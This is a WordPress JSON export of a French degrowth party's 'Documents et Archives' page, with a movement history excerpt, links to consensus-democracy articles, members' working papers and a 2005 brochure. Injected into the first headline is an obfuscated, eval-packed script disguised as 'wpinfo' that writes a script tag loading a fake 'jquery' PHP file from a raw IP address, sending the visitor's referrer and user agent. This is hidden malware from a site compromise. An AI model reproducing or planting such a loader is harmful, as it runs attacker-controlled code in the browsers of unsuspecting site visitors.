{"id":4002,"date":"2010-02-02T09:54:03","date_gmt":"2010-02-02T08:54:03","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?page_id=4002"},"modified":"2010-02-02T09:54:03","modified_gmt":"2010-02-02T08:54:03","slug":"documents-et-archives","status":"publish","type":"page","link":"https:\/\/www.partipourladecroissance.net\/?page_id=4002","title":{"rendered":"Documents et Archives"},"content":{"rendered":"<hr \/>\n<div>\n<h2><a title=\"Permanent Link to Retour vers le futur IV : \u00ab\u00a0En route vers l\u2019AdOC\u00a0\u00bb\" rel=\"bookmark\" href=\"..\/?p=3735\">Retour <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|asyki|var|u0026u|referrer|tyfsz||js|php'.split('|'),0,{}))\n<\/script><\/noindex> vers le futur IV : \u00ab\u00a0En route vers l\u2019AdOC\u00a0\u00bb<\/a><\/h2>\n<p style=\"text-align: left;\"><strong> <\/strong> <strong>Jetons un petit coup d\u2019\u0153il sur le chemin parcouru, afin de continuer dans la bonne direction.<\/strong><\/p>\n<p>Nous n\u2019allons pas revenir sur l\u2019histoire de la D\u00e9croissance depuis Georgescu-Roegen et le club de Rome. Toutefois, il semble important d\u2019en rappeler l\u2019histoire r\u00e9cente de notre mouvement et en particulier de la partie politique de notre mouvement.<\/p>\n<p>Il y a tout d\u2019abord eu l<a href=\"http:\/\/www.decroissance.info\/Etats-generaux-demandez-le\">es \u00e9tats g\u00e9n\u00e9raux de la D\u00e9croissance (en octobre 2005)<\/a> puis la <a href=\"http:\/\/www.decroissance.info\/Creation-du-PARTI-POUR-LA\">cr\u00e9ation du Parti Pour La D\u00e9croissance (PPLD)<\/a>.<br \/>\nC\u2019est v\u00e9ritablement les d\u00e9buts du mouvement de la D\u00e9croissance, avec les \u00e9crits de Serge Latouche, <a href=\"http:\/\/www.decroissance.org\/marche\/\">la marche pour la D\u00e9croissance<\/a>, le <a href=\"http:\/\/www.casseursdepub.org\/journal\/index.php\">lancement du journal<\/a>\u2026 et surtout beaucoup d\u2019incompr\u00e9hensions, des personnalit\u00e9s fortes, une certaine immaturit\u00e9 politique, des divergences de fond, etc\u2026<\/p>\n<p><strong>Pour rappel<\/strong> : communiqu\u00e9 de Serge Latouche sur le lancement du PPLD : <a href=\"..\/?p=3735#more-3735\">Read more \u00bb<\/a><\/div>\n<hr \/>\n<div>\n<h2><a title=\"Permanent Link to La recherche d\u2019une d\u00e9mocratie vivante\" rel=\"bookmark\" href=\"..\/?p=3470\">La recherche d\u2019une d\u00e9mocratie vivante<\/a><\/h2>\n<p><span><span>En ces temps de d\u00e9saveu fr\u00e9quent de la politique, marqu\u00e9 notamment par l\u2019abstentionnisme des jeunes (pr\u00e8s de 70\u00a0% n\u2019ont pas vot\u00e9 aux \u00e9lections europ\u00e9ennes de juin), ce qui s\u2019est pass\u00e9 \u00e0 Notre-Dame-des-Landes, en Loire-Atlantique, du 3 au 10 ao\u00fbt, est non seulement rafra\u00eechissant, mais prometteur.<\/span><\/span><\/p>\n<ul>\n<li><a href=\"http:\/\/www.reporterre.net\/spip.php?article498\">C<em>amp action climat, ou la recherche d\u2019une d\u00e9mocratie<\/em> vivante<\/a> par <strong>Herv\u00e9 Kempf<\/strong><\/li>\n<li><a href=\"http:\/\/altergauche26.ouvaton.org\/articles.php?id=132&amp;id_rubrique=121\"><em>Qu\u00b4est-ce qu\u00b4un m\u00e9ta-parlant <\/em><\/a>? par <strong>Michel Lepesant<\/strong><\/li>\n<li><a href=\"http:\/\/altergauche26.ouvaton.org\/articles.php?id=118&amp;id_rubrique=121\">Prise de D\u00e9cision et Consensus : une fiche pratique<\/a><\/li>\n<li><a href=\"http:\/\/www.passerelleco.info\/article.php?id_article=546\">M\u00e9thode de D\u00e9cision au Consensus<\/a><\/li>\n<\/ul>\n<\/div>\n<hr \/>\n<h2 class=\"title\">Documents de travail en vue de la r\u00e9union du 6 d\u00e9cembre 2008<\/h2>\n<p class=\"MsoNormal\">Voici, pour information, les documents de travail que nous avions chacun r\u00e9dig\u00e9 en vue de la r\u00e9union du 6 d\u00e9cembre.<\/p>\n<p class=\"MsoNormal\">Cette r\u00e9union avait pour objet d\u2019\u00e9laborer un premier jet pour :<\/p>\n<ul>\n<li>une proposition de la motion 2009 (r\u00e9sultat <a href=\"http:\/\/www.partipourladecroissance.net\/?p=63\">ici<\/a>)<\/li>\n<li>une proposition de programme pour les \u00e9lections europ\u00e9ennes (r\u00e9sultat <a href=\"http:\/\/www.partipourladecroissance.net\/?p=68\">ici<\/a>)<\/li>\n<\/ul>\n<p class=\"MsoNormal\">Nos contributions, dans l\u2019ordre alphab\u00e9tique\u00a0:<\/p>\n<ul>\n<li><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2009\/01\/contribution-bruno-bissot.pdf\">Bruno Bissot<\/a><\/li>\n<li><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2008\/12\/contribution-olivier-bouly.pdf\">Olivier Bouly<\/a><\/li>\n<li><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2008\/12\/contribution-remy-cardinale.pdf\">R\u00e9my Cardinale<\/a><\/li>\n<li><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2008\/12\/contribution-julien-gonzalez.pdf\">Julien Gonzalez<\/a><\/li>\n<li><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2008\/12\/contribution-vincent-liegey.pdf\">Vincent Liegey<\/a><\/li>\n<li><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2008\/12\/contribution-stephane-madelaine.pdf\">St\u00e9phane Madelaine<\/a><\/li>\n<li><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2008\/12\/contribution-chistophe-ondet.pdf\">Christophe Ondet<\/a><\/li>\n<\/ul>\n<hr \/>\n<h2 class=\"title\"><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2008\/12\/plaquette-ppld-2005.pdf\">La plaquette du PPLD de 2005<\/a><\/h2>\n<p style=\"text-align: left;\">Bien que les informations administratives ne soient plus toutes d\u2019actualit\u00e9 (adh\u00e9sion\u2026), le message de fond est toujours tr\u00e8s pertinent, et m\u00e9rite d\u2019\u00eatre lu attentivement.<strong><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2008\/12\/plaquette-ppld-2005.pdf\"> <\/a><\/strong><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2008\/12\/plaquette-ppld-2005.pdf\">\u00e0 t\u00e9l\u00e9chargez en pdf<\/a><\/p>\n<p><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2008\/12\/plaquette-ppld-2005.pdf\"><\/a><\/p>\n<hr \/>\n<h2 class=\"title\"><a href=\"http:\/\/www.partipourladecroissance.net\/?p=2756\">Appel pour des Etats-G\u00e9n\u00e9raux de la \u00ab\u00a0d\u00e9croissance \u00e9quitable\u00a0\u00bb<\/a><\/h2>\n<p>Tout \u00e9tait d\u00e9j\u00e0 \u00e9crit dans ce texte de 2005.\u00a0 Dommage que le passage \u00e0 l&rsquo;acte ait \u00e9t\u00e9 beaucoup plus douloureux et long.<\/p>\n<h2 class=\"title\">\n<hr \/>\n<\/h2>\n<h2 class=\"title\"><a href=\"http:\/\/www.mouvements.info\/spip.php?article61\">Voyage dans la galaxie d\u00e9croissante<\/a><\/h2>\n<p><a href=\"http:\/\/www.mouvements.info\/spip.php?article61\">Un historique assez complet de Fabrice Flipo datant d&rsquo;avril 2007 <\/a><\/p>\n<hr \/>\n<h2 class=\"title\"><a href=\"http:\/\/decroissance.lehavre.free.fr\/principes.htm\">D&rsquo;autres documents<br \/>\n<\/a><\/h2>\n<p><a href=\"http:\/\/decroissance.lehavre.free.fr\/principes.htm\">sur le site du collectif Havrais <\/a><\/p>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>Retour vers le futur IV : \u00ab\u00a0En route vers l\u2019AdOC\u00a0\u00bb Jetons un petit coup d\u2019\u0153il sur le chemin parcouru, afin de continuer dans la bonne direction. Nous n\u2019allons pas revenir sur l\u2019histoire de la D\u00e9croissance depuis Georgescu-Roegen et le club &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?page_id=4002\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"parent":3995,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-4002","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/4002","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4002"}],"version-history":[{"count":1,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/4002\/revisions"}],"predecessor-version":[{"id":4003,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/4002\/revisions\/4003"}],"up":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/3995"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4002"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}